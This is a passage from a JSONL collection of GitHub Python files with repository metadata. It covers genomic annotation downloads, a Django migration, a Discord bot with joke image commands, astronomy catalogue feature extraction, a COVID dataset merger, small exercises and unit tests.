folder\ndataFolder = '/Users/marjanfarahbod/Documents/projects/segwayLabeling/data/'\n\ndataSubFolder = 'testBatch105/fromAPI/'\n\ninputFile = dataFolder + dataSubFolder + 'metaInfo.pkl'\nwith open(inputFile, 'rb') as pickledFile:\n annMeta = pickle.load(pickledFile)\n\nsampleFolder_list = list(annMeta.keys())\n\n########################################\n# get the probs.txt files from the old files\n########################################\n\nfileList = list(glob.iglob(dataFolder + dataSubFolder + 'croo_may_16_2022/*.tsv'))\n# get all the .tsv files\n\n\n# from the html files, get the download links and the workflow_id\n\n# the file with list of samples to identifiers\naccession_ID_file = dataFolder + dataSubFolder + 'Jan_segway_runs_Paul - Detailed table.tsv'\n\nidentifier_sample_map = {}\nwith open(accession_ID_file, 'r') as inputFile:\n line = inputFile.readline()\n for line in inputFile:\n fields = line.strip().split()\n identifier_sample_map[fields[0]] = fields[1]\n\n\nc = 0\nfor file in fileList:\n identifier = file.split('.')[-2]\n if identifier in list(identifier_sample_map.keys()):\n accession = identifier_sample_map[identifier]\n downloadFile = dataFolder + dataSubFolder + accession + '/probs.txt'\n\n # open the file and pars the file for the line with the probs.txt\n\n with open(file, 'r') as addressFile:\n for line in addressFile:\n gs_link = line.strip().split('\\t')[1]\n #print(gs_link[-4:])\n if gs_link.endswith('probs.txt'):\n url = line.strip().split('\\t')[2]\n # download the probs file to its folder\n urllib.request.urlretrieve(url, downloadFile)\n c += 1\n print(c)\n print(accession)\n \n\n########################################\n# get the new batch of files \n########################################\n\n# the input folder:\nrunFolder = dataFolder + 'testBatch_May112022/'\n\n# download file folder\nfileList = list(glob.iglob(runFolder + 'croo_may_11_22/*.tsv'))\n\n# Note: these samples are not on the portal yet so they don't have Segway ID, they have the run ID\n\n# make the folders based on the file list:\nrunID_list = []\nid_file_map = {}\nfor file in fileList:\n run_id = file.split('.')[-2]\n runID_list.append(run_id)\n os.mkdir(runFolder + run_id)\n id_file_map[run_id] = file\n\nfile = runFolder + 'runID_list.pkl'\nwith open(file, 'wb') as outputFile:\n pickle.dump(runID_list, outputFile)\n\n\n# for each id in the runID_list, download the files listed in the files from id_file_map[id]\nc = 0\nfor run_id in runID_list:\n\n sampleFolder = runFolder + run_id + '/' # the folder where files are going to be downloaded\n addressesFile = id_file_map[run_id] # the .tab file with addresses of files to be downloaded\n\n # going to the .tab file with addresses of all files\n with open(addressesFile, 'r') as inputFile:\n #line = inputFile.readline() # the first line is genome data, we don't want that\n print(inputFile)\n print(c)\n c += 1\n downloadFolder = sampleFolder\n \n # make segtools folder\n os.mkdir(downloadFolder + 'call-segtools')\n segtoolsFolder = downloadFolder + 'call-segtools/'\n \n # make interpretation folder\n os.mkdir(downloadFolder + 'call-interpretation')\n interpretationFolder = downloadFolder + 'call-interpretation/'\n\n # make segway folder\n os.mkdir(downloadFolder + 'call-segway')\n segwayFolder = downloadFolder + 'call-segway/'\n\n for line in inputFile:\n download_url = line.split('\\t')[2]\n fileName = line.split('\\t')[1]\n\n downloadFolder = sampleFolder\n\n if 'genomedata' in fileName:\n print('gdata - skipping')\n continue\n \n if 'call-segway' in fileName:\n downloadFolder = segwayFolder\n \n if 'call-segtools' in fileName:\n downloadFolder = segtoolsFolder\n\n if 'call-interpretation' in fileName:\n downloadFolder = interpretationFolder\n\n downloadFileName = fileName.split('/')[-1]\n \n downloadFile = downloadFolder + downloadFileName\n print(downloadFile)\n \n urllib.request.urlretrieve(download_url, downloadFile)\n\n print('done download')\n\n\n\n\n","repo_name":"marjanfarahbod/SegwayClustering","sub_path":"annotation_fileDownload.py","file_name":"annotation_fileDownload.py","file_ext":"py","file_size_in_byte":4999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"40299440074","text":"from django.db import models\n\n# NOC modules\nfrom noc.core.migration.base import BaseMigration\n\n\nclass Migration(BaseMigration):\n def migrate(self):\n self.db.add_column(\n \"fm_eventclassificationrule\",\n \"drop_event\",\n models.BooleanField(\"Drop Event\", default=False),\n )\n","repo_name":"nocproject/noc","sub_path":"fm/migrations/0006_rule_drop_event.py","file_name":"0006_rule_drop_event.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"51"} +{"seq_id":"21263703445","text":"import sys\n\ndef readvalues(filename):\n \"\"\"reads input configuration from filename\"\"\"\n file = open(filename,\"r\")\n res = []\n i = 3\n for line in file:\n \n if i%4 == 0:\n x = line[:-1].split(\"m\")\n i = 1\n sys.stdout.write(x[1][:-1] + \",\")\n else:\n i += 1\n\nreadvalues(sys.argv[1])","repo_name":"lidiamcfreitas/ASA","sub_path":"tests/readTime.py","file_name":"readTime.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"34962541820","text":"import discord\nfrom discord.ext import commands \nimport random\n\n\n# ==== Cog ====\nclass Fun(commands.Cog):\n # ==== Init ====\n def __init__(self, bot):\n self.bot = bot\n\n\n # ==== Commands ====\n @commands.command(name='ratspin',\n help='Uploads an image of a spinning rat or falls back onto pasting a URL',\n brief='SPEEN')\n async def ratspin(self, context):\n # Delete command from user and log\n author = context.message.author\n print(f'- [Fun] !ratspin called by {author}')\n author = str(author).split('#')[0]\n await context.message.delete()\n\n # Try to upload, if that fails, paste URL\n try:\n with open('../assets/rat-spinning.gif', 'rb') as f:\n picture = discord.File(f)\n await context.send(f'{author} says: SPEEN', file=picture)\n except:\n image_url = \"https://media.tenor.com/aaEMtGfZFbkAAAAi/rat-spinning.gif'\"\n await context.send(image_url)\n\n\n @commands.command(name='ratcum',\n hidden=True,\n brief='What will you get??')\n async def ratcum(self, context):\n # Delete command from user and log\n author = context.message.author\n print(f'- [Fun] !ratcum called by {author}')\n author = str(author).split('#')[0]\n await context.message.delete()\n\n # Try to upload, if that fails, paste URL\n try:\n rand_int = random.randint(0, 100)\n if rand_int <= 50:\n with open('../assets/Top_Rat.jpg', 'rb') as f:\n picture = discord.File(f)\n picture.filename = f'SPOILER_{picture.filename}'\n await context.send(f'{author} says: ~uuhhnnh~', file=picture)\n if rand_int > 50 and rand_int <= 99:\n with open('../assets/Bottom_Rat.jpg', 'rb') as f:\n picture = discord.File(f)\n picture.filename = f'SPOILER_{picture.filename}'\n await context.send(f'{author} says: ~uuhhnnh~', file=picture)\n if rand_int == 100:\n with open('../assets/Chad_Rat.jpg', 'rb') as f:\n picture = discord.File(f)\n picture.filename = f'SPOILER_{picture.filename}'\n await context.send(f'{author} **ROLLED A RARE RAT!**', file=picture)\n\n except:\n await context.send('Error: Rat could not finish')\n\n\n# ==== Setup ====\nasync def setup(bot):\n await bot.add_cog(Fun(bot))","repo_name":"gooop/Systematic-Rat","sub_path":"src/cogs/Fun.py","file_name":"Fun.py","file_ext":"py","file_size_in_byte":2568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"34424038794","text":"import argparse\nimport numpy as np\nfrom astropy.io import fits\n\ndef extract_3fgl(data_path, out_path):\n '''Extract the features from the 3fgl dataset'''\n # Open the fits file\n hdul = fits.open(data_path)\n\n # Extract the AGNs and the pulsars\n classes = hdul[1].data['CLASS1']\n agn_classes = ['psr ', 'agn ', 'FSRQ ', 'fsrq ', 'BLL ', 'bll ', 'BCU ', 'bcu ', 'RDG ', 'rdg ', 'NLSY1', 'nlsy1', 'ssrq ', 'sey ']\n pulsar_classes = ['PSR ', 'psr ']\n agn_mask = np.isin(classes, agn_classes)\n pulsar_mask = np.isin(classes, pulsar_classes)\n\n # Some columns in the 3fgl dataset have bad data\n bad_data_mask = hdul[1].data['Signif_Curve'] == 0.0\n agn_mask = agn_mask & ~bad_data_mask\n pulsar_mask = pulsar_mask & ~bad_data_mask\n\n # Combine the AGNs and pulsars\n data = hdul[1].data[agn_mask | pulsar_mask]\n\n # Extract the 11 features we need for 3fgl\n # The easy ones\n glat = data['GLAT']\n glon = data['GLON']\n ln_energy_flux100 = np.log(data['Energy_Flux100'])\n ln_unc_energy_flux100 = np.log(data['Unc_Energy_Flux100'])\n ln_signif_curve = np.log(data['Signif_Curve'])\n ln_var_index = np.log(data['Variability_Index'])\n\n # Hardness ratios\n ef1 = data['Flux100_300']\n ef2 = data['Flux300_1000']\n ef3 = data['Flux1000_3000']\n ef4 = data['Flux3000_10000']\n ef5 = data['Flux10000_100000']\n hr12 = (ef2 - ef1) / (ef2 + ef1)\n hr23 = (ef3 - ef2) / (ef3 + ef2)\n hr34 = (ef4 - ef3) / (ef4 + ef3)\n hr45 = (ef5 - ef4) / (ef5 + ef4)\n\n # 500 MeV index\n alpha = data['Spectral_Index']\n beta = data['beta']\n gamma = data['Spectral_Index']\n b = data['Exp_Index']\n E_c = data['Cutoff'] # In MeV\n E_0 = data['Pivot_Energy'] # In MeV\n mev_500_index = np.zeros(data.shape)\n for i, point in enumerate(data):\n if point['SpectrumType'] in ['PowerLaw', 'PLExpCutoff', 'PLSuperExpCutoff']:\n if b[i] == float('-inf'):\n b[i] = 1\n mev_500_index[i] = gamma[i] + b[i] * (500 / E_c[i])**b[i]\n else:\n mev_500_index[i] = alpha[i] + 2*beta[i] * np.log(500 / E_0[i])\n\n in_data = np.vstack((glat, glon, ln_energy_flux100, ln_unc_energy_flux100, ln_signif_curve, ln_var_index, hr12, hr23, hr34, hr45, mev_500_index))\n out_data = np.isin(data['CLASS1'], agn_classes).astype(int)\n\n # Save Data\n np.savez_compressed(out_path, in_data=in_data.T, out_data=out_data)\n\ndef extract_4fgl(data_path, out_path):\n '''Extract the features from the 4fgl dataset'''\n # Open the fits file\n hdul = fits.open(data_path)\n\n # Extract the AGNs and the pulsars\n classes = hdul[1].data['CLASS1']\n agn_classes = ['psr ', 'agn ', 'FSRQ ', 'fsrq ', 'BLL ', 'bll ', 'BCU ', 'bcu ', 'RDG ', 'rdg ', 'NLSY1', 'nlsy1', 'ssrq ', 'sey ']\n pulsar_classes = ['PSR ', 'psr ']\n agn_mask = np.isin(classes, agn_classes)\n pulsar_mask = np.isin(classes, pulsar_classes)\n\n # Some columns in the 4fgl dataset have bad data\n bad_data_mask = np.isnan(hdul[1].data['Unc_LP_Index']) | np.isnan(hdul[1].data['LP_Index']) | np.isnan(hdul[1].data['LP_beta'])\n agn_mask = agn_mask & ~bad_data_mask\n pulsar_mask = pulsar_mask & ~bad_data_mask\n\n # Combine the AGNs and pulsars\n data = hdul[1].data[agn_mask | pulsar_mask]\n\n # Extract the 16 features we need for 4fgl (minus the 6 Hardess Ratios, not in the dataset)\n glat = data['GLAT']\n glon = data['GLON']\n ln_pivot_energy = np.log(data['Pivot_Energy'])\n unc_lp_index = data['Unc_LP_Index']\n lp_index = data['LP_Index']\n lp_beta = data['LP_beta']\n lp_sincurv = data['LP_SigCurv']\n ln_energy_flux100 = np.log(data['Energy_Flux100'])\n ln_unc_energy_flux100 = np.log(data['Unc_Energy_Flux100'])\n ln_var_index = np.log(data['Variability_Index'])\n\n in_data = np.vstack((glat, glon, ln_energy_flux100, ln_unc_energy_flux100, ln_var_index, ln_pivot_energy, lp_index, unc_lp_index, lp_beta, lp_sincurv))\n out_data = np.isin(data['CLASS1'], agn_classes).astype(int)\n \n # Save Data\n np.savez_compressed(out_path, in_data=in_data.T, out_data=out_data)\n\nif __name__ == '__main__':\n #python3 data_extr.py --data3fgl data/gll_psc_v16.fit --data4fgl data/gll_psc_v27.fit --outfile3fgl data/3fgl --outfile4fgl data/4fgl\n parser = argparse.ArgumentParser(description='Duplicates pulsars in dataset to even out number of AGNs and pulsars for oversampling')\n parser.add_argument('--data3fgl', help='A file/path containing input data')\n parser.add_argument('--data4fgl', help='A file/path containing input data')\n parser.add_argument('--outfile3fgl', help='Desired name of output file (include file path if needed, ex. data/3fgl)')\n parser.add_argument('--outfile4fgl', help='Desired name of output file (include file path if needed, ex. data/4fgl)')\n \n args = parser.parse_args()\n\n extract_3fgl(args.data3fgl, args.outfile3fgl)\n extract_4fgl(args.data4fgl, args.outfile4fgl)\n\n\n print(\"Extraction complete\")","repo_name":"PaulVirally/PHYS-449-Group-4-Project","sub_path":"data_extr.py","file_name":"data_extr.py","file_ext":"py","file_size_in_byte":4991,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"32572049107","text":"from pathlib import Path\n\nfrom langworld_db_data.constants.paths import (\n FEATURE_PROFILES_DIR,\n FILE_WITH_LISTED_VALUES,\n FILE_WITH_NAMES_OF_FEATURES,\n DISCUSSION_FILE_WITH_LISTED_VALUES,\n)\nfrom langworld_db_data.mdlisters.abstract_value_lister import AbstractValueLister\nfrom langworld_db_data.filetools.csv_xls import read_csv, read_dict_from_2_csv_columns\n\n\nclass ListedValueLister(AbstractValueLister):\n def __init__(\n self,\n dir_with_feature_profiles: Path = FEATURE_PROFILES_DIR,\n file_with_listed_values: Path = FILE_WITH_LISTED_VALUES,\n ):\n super().__init__(value_type='listed', dir_with_feature_profiles=dir_with_feature_profiles)\n self.file_with_listed_values = file_with_listed_values\n \n def write_grouped_by_feature(\n self, output_file: Path = DISCUSSION_FILE_WITH_LISTED_VALUES\n ):\n\n feature_ids = [\n row['id'] for row in\n read_csv(FILE_WITH_NAMES_OF_FEATURES, read_as='dicts')\n ]\n\n rows_with_listed_values = read_csv(self.file_with_listed_values, read_as='dicts')\n\n feature_to_value_to_doculects = {\n feature_id: {\n row['id']: [] for row in rows_with_listed_values if row['feature_id'] == feature_id\n }\n for feature_id in feature_ids\n }\n\n for volume_and_doculect_id in self.filtered_rows_for_volume_doculect_id:\n for row in self.filtered_rows_for_volume_doculect_id[volume_and_doculect_id]:\n feature_to_value_to_doculects[row['feature_id']][row['value_id']].append(volume_and_doculect_id)\n\n feature_name_for_feature_id = read_dict_from_2_csv_columns(\n FILE_WITH_NAMES_OF_FEATURES,\n key_col='id',\n val_col='ru',\n )\n\n value_name_for_value_id = read_dict_from_2_csv_columns(\n self.file_with_listed_values,\n key_col='id',\n val_col='ru'\n )\n\n content = (\n f'# Значения типа `{self.value_type}`\\n'\n 'Оглавление файла открывается кнопкой сверху слева рядом с индикатором количества строк.'\n )\n\n for feature_id in feature_name_for_feature_id:\n content += f'\\n\\n## {feature_id} — {feature_name_for_feature_id[feature_id]}\\n'\n\n for value_id in feature_to_value_to_doculects[feature_id]:\n content += f'\\n- **{value_name_for_value_id[value_id]}** ({value_id}): ' \\\n f'кол-во языков — **{len(feature_to_value_to_doculects[feature_id][value_id])}**'\n\n # # This is good but leads to a very large file being generated. GitHub refuses to show its content.\n # if not feature_to_value_to_doculects[feature_id][value_id]:\n # content += '_Нет языков_'\n #\n # else:\n # for volume_and_doculect_id in feature_to_value_to_doculects[feature_id][value_id]:\n # volume, doculect_id = volume_and_doculect_id.split(':')\n # content += (\n # f'[{self.doculect_ru_for_doculect_id[doculect_id]}]'\n # f'(../feature_profiles/{doculect_id}.csv){volume}, '\n # )\n # content = content[:-2] # removing last ', '\n\n # print(content)\n\n with output_file.open(mode='w+', encoding='utf-8') as fh:\n fh.write(content)\n\n def write_grouped_by_volume_and_doculect(\n self, output_file: Path\n ):\n pass\n\n\nif __name__ == '__main__':\n lister = ListedValueLister()\n lister.write_grouped_by_feature()\n","repo_name":"Antaresselen87/langworld_db_data","sub_path":"langworld_db_data/mdlisters/listed_value_lister.py","file_name":"listed_value_lister.py","file_ext":"py","file_size_in_byte":3780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"51"} +{"seq_id":"74775745117","text":"\r\nclass User:\r\n name = \"default\"\r\n player_choice = 'Stone'\r\n def __init__(self, name, player_choices):\r\n self.name = name\r\n self.player_choice = player_choices\r\n\r\n def set(self, name):\r\n self.name = name\r\n \r\ndef WhoWin(fPlayer, sPlayer):\r\n if fPlayer.player_choice == sPlayer.player_choice:\r\n print(\"draw\")\r\n print(fPlayer.player_choice, \" \", sPlayer.player_choice)\r\n else:\r\n list = []\r\n list.append(fPlayer.player_choice)\r\n list.append(sPlayer.player_choice)\r\n papper = False\r\n stone = False\r\n scissors = False\r\n for l in list:\r\n if l == \"papper\":\r\n papper = True\r\n elif l == \"stone\":\r\n stone = True\r\n elif l == \"scissors\":\r\n scissors = True\r\n if(papper and stone):\r\n if(fPlayer.player_choice == \"papper\"):\r\n print(\"Win: \", fPlayer.name)\r\n else:\r\n print(\"Win: \", sPlayer.name)\r\n elif(papper and scissors):\r\n if(fPlayer.player_choice == \"scissors\"):\r\n print(\"Win: \", fPlayer.name)\r\n else:\r\n print(\"Win: \", sPlayer.name)\r\n elif(scissors and stone):\r\n if(fPlayer.player_choice == \"stone\"):\r\n print(\"Win: \", fPlayer.name)\r\n else:\r\n print(\"Win: \", sPlayer.name) \r\n \r\n ","repo_name":"tysunday/itproger","sub_path":"hw_python/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"37173772928","text":"import pandas as pd\nimport sqlite3\nimport os\nimport csv\n\nCOVID_COLS = [\"CumulativePositive\", \"CumulativeDeceased\", \"CumulativeRecovered\", \"CurrentlyPositive\", \"Hospitalized\", \"IntensiveCare\"]\nPOLICIES_COLS = [\"Curfew\"]\n\nclass Policies(object):\n def __init__(self, file_name):\n self.file_name = file_name\n self.df = self._load_df()\n \n def _load_df(self):\n \"\"\"\n Load and pre-process the policy file\n \"\"\"\n return pd.read_csv(self.file_name)\n \n def extract_policy_from_iso_a2_code(self, nuts2_code, iso_a2_code):\n \"\"\"\n Extract the policy from an ISO-A2 code\n \"\"\"\n out_df = self.df[self.df[\"province\"] == iso_a2_code][[\"date\"] + POLICIES_COLS]\n out_df[\"NUTS\"] = nuts2_code\n return out_df\n \nclass CovidCases(object):\n def __init__(self, covid_file_name, datasetMerger):\n self.covid_file_name = covid_file_name\n self.datasetMerger = datasetMerger\n self.df = self._load_df()\n \n def _load_df(self):\n \"\"\"\n Load and pre-process the file with Covid cases\n \"\"\"\n df = pd.read_csv(self.covid_file_name)\n df[COVID_COLS] = df[COVID_COLS].fillna(0)\n return df\n \n def _find_children_from_nuts_2(self, nuts2_code, dataset_merger):\n \"\"\"\n From a nuts2_code, get all the children nuts3 codes\n params:\n nuts2_code: str\n \n return:\n list (str)\n \"\"\"\n return dataset_merger.db_df[self.datasetMerger.db_df[\"NUTS\"] == nuts2_code][\"Covid (NUTS)\"].to_list()\n \n def _aggregate_from_nuts_2(self, nuts2_code, dataset_merger):\n \"\"\"\n Sum all covid cases from a nuts2_code aggregation\n params:\n nuts2_code: str\n return:\n DataFrame\n \"\"\"\n \n # Call _find_children_from_nuts_2(self, nuts2_code)\n \n # Sum all\n covid_keys = self._find_children_from_nuts_2(nuts2_code, dataset_merger)\n return self.df[self.df[\"NUTS\"].isin(covid_keys)].groupby([\"Date\"])[COVID_COLS].sum().reset_index()\n \n def get_covid_cases(self, covid_code, nuts2_code, dataset_merger):\n \"\"\"\n Get all covid cases\n params:\n covid_code: str\n nuts2_code: str \n \"\"\"\n \n # If covid_code == nuts2_code, then just extract data from covid_code\n # Else, call _aggregate_from_nuts_2 \n out_df = None\n if covid_code == nuts2_code:\n out_df = self.df[self.df[\"NUTS\"] == nuts2_code][[\"Date\"] + COVID_COLS]\n else:\n #print(\"aaaaaaa: \", covid_code, \" \", nuts2_code )\n out_df = self._aggregate_from_nuts_2(nuts2_code, dataset_merger)\n \n out_df[\"NUTS\"] = nuts2_code\n return out_df\n \n \nclass Covariate(object):\n def __init__(self, file_path, file_type='xlsx', aggregation_method='sum'):\n \"\"\"\n Covariate file\n params: \n file_name: str\n file_type: str\n among 'xlsx', 'tsv', 'csv'\n aggregation_method: str\n among 'sum', 'popsum', 'avg'\n \"\"\"\n self.file_path = file_path\n self.file_type = file_type\n self.aggregation_method = aggregation_method\n \n self.col_name = '.'.join([file_path, aggregation_method])\n \n self.df = self._load_df()\n \n \n def _load_df(self):\n \"\"\"\n Load the covariate data\n \n :return\n DataFrame\n \"\"\"\n \n df = None\n # Check the file type and load from the according file type\n if self.file_type == \"xlsx\":\n df = self._load_excel()\n elif self.file_type == \"csv\":\n df = self._load_csv()\n elif self.file_type == \"tsv\":\n df = self._load_tsv()\n \n return self._compute_covariate_value(df)\n \n \n def _load_excel(self):\n \"\"\"\n Load from an .xlsx file\n \n :return\n DataFrame\n \"\"\"\n return pd.read_excel(self.file_path)\n \n def _load_csv(self):\n \"\"\"\n Read from an .csv file\n \n :return\n DataFrame\n \"\"\"\n return pd.read_csv(self.file_path)\n \n def _load_tsv(self):\n \"\"\"\n Read from an .tsv file\n \n :return\n DataFrame\n \"\"\"\n return pd.read_csv(self.file_path, sep='\\t') \n \n @staticmethod\n def _compute_covariate_value(df):\n \"\"\"\n Compute the covariate value by coalescing the columns from right-most to left-most\n \n :return\n DataFrame\n \"\"\"\n return df.assign(\n covariate_value=pd.to_numeric(df.iloc[:, ::-1].notnull().idxmax(1).pipe(\n lambda d: df.lookup(d.index, d.values)\n ), errors='coerce')\n )\n \n def extract_covariate(self, nuts_codes):\n \"\"\"\n Extract the covariate value for given nuts_codes and a specified aggregartion method\n \n params:\n nuts_codes: list (str)\n \n return:\n DataFrame\n \"\"\"\n \n if len(nuts_codes) > 1:\n return self.df[self.df.iloc[:, 0].isin(nuts_codes)][\"covariate_value\"].aggregate(self.aggregation_method)\n else:\n return self.df[self.df.iloc[:, 0] == nuts_codes[0]][\"covariate_value\"].values[0]\n\n \n \nclass DatasetsMerger(object):\n \n def __init__(self, db_filename, covid_file_name, eurostat_folder, policy_file_name, db_folder='./', db_sheet=3):\n \"\"\"\n DatasetMerger\n \n params:\n db_file_name: str\n db_folder: str\n \"\"\"\n self.db_filename = db_filename\n self.covid_file_name = covid_file_name \n self.eurostat_folder = eurostat_folder\n self.policy_file_name = policy_file_name\n self.db_folder = db_folder\n self.db_sheet = db_sheet\n \n \n self.db_df = self._load_db_df()\n print(self.db_df.columns[:25])\n self.covariates = self._load_covariates()\n self.covid_cases = self._load_covid_cases()\n self.policies = self._load_policies()\n \n self._raw_data = {}\n \n \n \n \n def _load_db_df(self):\n \"\"\"\n Load the DBFinale\n \n returns:\n DataFrame\n \"\"\"\n return pd.read_excel(self.db_filename, sheet_name = self.db_sheet)\n #return pd.read_csv(self.db_file_name, sep=\"\\t\")\n def _load_covariates(self):\n \"\"\"\n Load all the covariates from the db_df\n \n return:\n list (Covariate)\n \"\"\"\n \n # Return a map of {col_name_cov_1: Covariate(), col_name_cov_2: Covariate(), ...}\n covs = {}\n #\"\"\"\n for covariate_info in list(self.db_df.columns.values)[8:]:\n if \"inserire nome covariate\" in covariate_info:\n continue\n \n try:\n cov_file_name = covariate_info.split(\".\")[0]\n cov_file_type = covariate_info.split(\".\")[1]\n cov_agg_method = covariate_info.split(\".\")[2]\n \n cov_file_path = os.path.join(self.eurostat_folder, cov_file_name + '.' + cov_file_type) \n covs[covariate_info] = Covariate(cov_file_path, file_type=cov_file_type, aggregation_method=cov_agg_method)\n except Exception as e:\n print(covariate_info, \" \",e)\n pass\n \"\"\" \n with open(self.db_filename) as fd:\n reader = csv.reader(fd, delimiter=\"\\t\", quotechar='\"')\n for line in fd:\n print(line)\n next(reader, None) # skip the headers\n for row in reader:\n print(row)\n cov_file_name = row[0]\n \n cov_name = row[0].split(\".\")[0]\n cov_file_type = row[0].split(\".\")[-1]\n cov_agg_method = row[-1]\n \n cov_file_path = os.path.join(self.eurostat_folder, cov_file_name) \n covs[cov_name] = Covariate(cov_file_path, file_type=cov_file_type, aggregation_method=cov_agg_method)\n \"\"\"\n return covs\n \n \n \n def _load_covid_cases(self):\n \"\"\"\n Load Covid Cases\n \n return:\n CovidCases\n \"\"\"\n \n # Return CovidCases\n return CovidCases(self.covid_file_name, self)\n \n \n def _load_policies(self):\n \"\"\"\n Load Policies\n \n return:\n Policiesd4f\n \"\"\"\n \n # Return Policies\n return Policies(self.policy_file_name)\n \n \n def merge(self):\n \"\"\"\n Merge the dataset\n \n return:\n SQLLite Database\n \"\"\"\n all_policies = []\n all_cov_values = []\n all_covid_cases = []\n \n _already_seen_nuts = []\n \n # Loop over all the rows\n for index, r in self.db_df.iterrows():\n \n if r[\"NUTS\"] in _already_seen_nuts:\n continue\n _already_seen_nuts.append(r[\"NUTS\"])\n \n covid_infos = self.covid_cases.get_covid_cases(r[\"Covid (NUTS)\"], r[\"NUTS\"], self)\n policies = self.policies.extract_policy_from_iso_a2_code(r[\"NUTS\"], r[\"ISO_A2 (FOR NATIONAL POLICIES)\"])\n \n all_policies.append(policies)\n all_covid_cases.append(covid_infos)\n \n for cov_col_name, cov in self.covariates.items():\n try:\n nuts_codes = list(map(lambda e: e.strip(), r[cov_col_name].split('/')))\n cov_value = cov.extract_covariate(nuts_codes)\n all_cov_values.append([r['Key'], cov_col_name.split(\".\")[0], cov_value])\n except Exception:\n all_cov_values.append([r['Key'], cov_col_name.split(\".\")[0], None])\n \n self._raw_data[\"policies\"] = all_policies\n self._raw_data[\"covariates\"] = all_cov_values\n self._raw_data[\"covid\"] = all_covid_cases\n \n \n def save_to_sqlite(self):\n \"\"\"\n Save the data to SQLLite Format\n \"\"\"\n \n to_store_covid = pd.concat(self._raw_data[\"covid\"])\n to_store_covariates = pd.DataFrame(self._raw_data[\"covariates\"], columns=[\"NUTS\", \"Covariate\", \"Value\"])\n to_store_policies = pd.concat(self._raw_data[\"policies\"])\n \n output_db_file_path = os.path.join(self.db_folder,\"covid_at_lombardy.sqlite\")\n conn = sqlite3.connect(output_db_file_path)\n to_store_covid.to_sql('covid_cases', conn, if_exists='replace', index=False)\n to_store_covariates.to_sql('covariates', conn, if_exists='replace', index=False)\n to_store_policies.to_sql('policies', conn, if_exists='replace', index=False)\n \n \n \n\n \n ","repo_name":"Chris1nexus/covid-eu-analysis","sub_path":"database/db_gen_lib/db_utils.py","file_name":"db_utils.py","file_ext":"py","file_size_in_byte":11402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"22075249546","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:\n import sys\n dummy = ListNode(-sys.maxsize)\n pre = None\n pre = dummy\n while (l1 and l2):\n if l1.val <= l2.val:\n pre.next, pre, l1 = l1, l1, l1.next\n else:\n pre.next, pre, l2 = l2, l2, l2.next\n if not l1:\n pre.next = l2\n elif not l2:\n pre.next = l1\n return dummy.next\n\n\n\n# remember to create a dummy node which could reduce the complexity of such problems\n","repo_name":"JerryZhuzq/leetcode","sub_path":"linked list/21. Merge Two Sorted Lists.py","file_name":"21. Merge Two Sorted Lists.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"35306036073","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom unittest.mock import patch, mock_open\nfrom lib import utils\nimport unittest\nimport pandas as pd\nimport collections\n\n\nclass UtilsTestCase(unittest.TestCase):\n\n def setUp(self):\n pass\n\n def test_read_save(self):\n\n with patch(\"builtins.open\", mock_open(read_data=\"data\")) as mock_file:\n\n file_input = utils.read_save(mock_file)\n self.assertTrue(file_input == \"data\")\n\n def test_fill_parameters(self):\n\n out_parameters = utils.fill_parameters(parameter_raw=dict())\n self.assertTrue(set(out_parameters.keys()) == {\"scope\", \"num_words\", \"file_ending\", \"folder\",\n \"windowsize\", \"ratio\", \"maxlen\", \"gram_size\", \"chunk_size\", \"lang\",\n \"categorical_scope\", \"chunk_scope\", \"sequence_scope\"})\n\n def test_context_grabber(self):\n\n context = utils.context_grabber([\"a\", \"b\", \"c\"], 3)\n self.assertTrue(context == ['padder padder padder a b c padder',\n 'padder padder a b c padder padder',\n 'padder a b c padder padder padder'])\n\n def test_TrainingData_init(self):\n\n test_object = utils.TrainingData(num_words=100, file_ending=\".test\", folder=\"foo/bar\", windowsize=0,\n ratio=0.1, maxlen=0, chunk_size=0, gram_size=0, lang=\"de\", chunk_scope=\"scope\", sequence_scope=\"scope\",\n categorical_scope=\"scope\")\n\n self.assertTrue(test_object.categorical_scope == \"scope\" and\n test_object.chunk_scope == \"scope\" and\n test_object.sequence_scope == \"scope\" and\n test_object.num_words == 100 and\n test_object.file_ending == \".test\" and\n test_object.folder == \"foo/bar\" and\n test_object.windowsize == 0 and\n test_object.ratio == 0.1 and\n test_object.maxlen == 0 and\n test_object.chunk_size == 0 and\n test_object.gram_size == 0 and\n test_object.lang == \"de\" and\n test_object.X == None and\n test_object.Y == None and\n test_object.x_train == None and\n test_object.x_test == None and\n test_object.y_train == None and\n test_object.y_test == None and\n isinstance(test_object.corpus_df, type(pd.DataFrame()))\n )\n\n @unittest.mock.patch('os.walk')\n def test_collect_files_from_dir(self, mock_walk):\n\n mock_walk.return_value = [(\"foo\", \"bar\", [\"Training.test\"]), (\"foo\", \"bar\", [\"Training.txt\"])]\n mock = unittest.mock.Mock()\n mock.folder = \"\"\n mock.file_ending = \".test\"\n mock.DataFrame = pd.DataFrame()\n output = utils.TrainingData.collect_files_from_dir(mock)\n self.assertTrue(list(output[\"file_path\"]) == [\"foo/Training.test\"])\n\n def test_add_categories(self):\n\n mock_obj = unittest.mock.Mock()\n mock_obj.corpus_df = pd.DataFrame({\"file_path\": [\"foo/a/Training.test\",\n \"foo/b/Training.test\",\n \"foo/b/Training.test\",\n \"foo/c/Training.test\"]})\n\n output = utils.TrainingData.add_categories(mock_obj)\n self.assertTrue(list(output[\"Categories\"] == [\"a\", \"b\", 